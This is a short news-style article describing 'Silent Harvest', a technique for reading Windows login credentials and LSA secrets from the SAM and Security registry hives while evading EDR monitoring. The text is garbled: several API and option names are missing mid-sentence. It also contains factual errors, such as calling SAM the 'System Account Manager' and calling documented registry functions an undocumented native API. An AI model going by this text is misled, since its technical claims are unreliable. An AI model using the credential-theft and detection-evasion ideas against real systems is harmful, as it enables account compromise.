Unnoticed Extraction of Data: Hidden Windows Secrets Uncovered

In the realm of cybersecurity, a new technique known as "Silent Harvest" has been making waves. This method, which leverages lesser-known Windows APIs, allows for the harvesting of Windows login credentials and secrets without raising alerts from typical security solutions.

At the heart of this technique lies the Local Security Authority (LSA), responsible for managing secrets and login information in Windows. The LSA runs within the process. The SAM (System Account Manager) and Security databases, which correspond to the registry structures and on the hard drive, store the necessary information.

The SAM database, while storing Windows users, groups, and login information, does not provide direct API functions to retrieve clear-text login information. Instead, the Silent Harvest technique employs the undocumented native API "RegOpenKeyEx" and "RegQueryValueEx" to bypass this barrier.

These APIs, along with options such as and , can bypass sensitive key Access Control List (ACL) checks when activated, further enhancing the stealthiness of the technique.

Once a handle is obtained, normal routines like can read the data directly from memory without any hive files ever touching the hard drive. This operation takes place entirely in memory, with no hive files being created and no high-frequency "red-flag" APIs being called, making it hard for traditional endpoint detection and response (EDR) systems to detect.

The Security database manages four key objects: Policy, Trusted Domain, Account, and Secret. Values within these objects are stored in encrypted form and require additional steps to decrypt them. However, the function "RegQueryValueEx" is not commonly monitored by EDR vendors, providing a potential avenue for bypassing detection mechanisms.

A key detection mechanism in modern Endpoint Detection & Response (EDR) software is the use of callback routines in kernel mode. The EDR driver registers and provides a callback function address to monitor registry activities. However, the Silent Harvest technique operates entirely in memory, bypassing these routines.

The technique "Silent Harvest" serves as a reminder of the importance of considering less common functions in defensive strategies. As vendors may eventually incorporate these methods into their monitoring logic, it underscores the need for continuous vigilance and adaptability in the ever-evolving cybersecurity landscape.

The company that employed the security researcher Sud0Ru, who discovered this technique, is Rohde & Schwarz, a global leader in secure communications. This discovery further highlights the importance of collaboration between security researchers and organisations in the ongoing battle against cyber threats.